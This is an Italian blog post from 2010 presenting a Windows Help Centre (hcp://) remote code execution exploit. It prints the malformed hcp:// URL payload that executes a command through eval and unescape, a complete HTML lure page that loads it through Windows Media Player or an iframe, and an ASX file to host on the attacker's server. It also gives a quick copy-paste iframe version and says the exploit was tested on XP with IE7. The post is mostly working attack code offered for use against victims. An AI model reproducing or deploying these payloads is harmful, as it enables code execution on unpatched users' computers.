[EXPLOIT]Windows Help Centre Remote code Excution

Posted on: 10 June 2010

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

Perciò, non dovremo fare altro che far aprire alla vittima un file asx con windows media player :D
P.S: sotto c’è scritto come fare prima -.-’ senza file asx :D

Qui entra in gioco il browser che ci consente di fare questo ;)
Pagina html da far visualizzare alla vittima:

<html>
<head><title>Testing HCP</title></head>
<body>
  <h1>OK</h1>
  <script>
        // HCP:// Vulnerability, Tavis Ormandy, June 2010.
        var asx = "SIMPLE.ASX";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            // Internet Explorer
            var o = document.createElement("OBJECT");
            o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
            o.openPlayer(asx);
        } else {
            // Mozilla, Chrome, Etc.
            var o = document.createElement("IFRAME");
            o.setAttribute("src", asx);
            document.body.appendChild(o);
        }
  </script>
</body>
</html>

Dove il file SIMPLE.ASX, sarà sul nostro server e sarà composto così:

<ASX VERSION="3.0">
<PARAM name="HTMLView" value="starthelp.html"/>
<ENTRY>
   <REF href="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>

E dove il file starthelp sarà composto così:

<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

Io adesso non ho capito perché bisogna passare dal file asx -.-’ gli autori si sono complicati la vita -.-’

Se volete eseguire l’exploit in velocità basta che copiate questo in html:

<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

Provato su windows XP e IE 7 e tutto funziona ;)
Per una volta IE non centra niente però :D

LINK EXPLOIT UFFICIALE E DOCUMENTAZIONE

This entry was posted on Thursday, June 10th, 2010 at 10:06 am and is filed under Hacking, Software, Windows. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.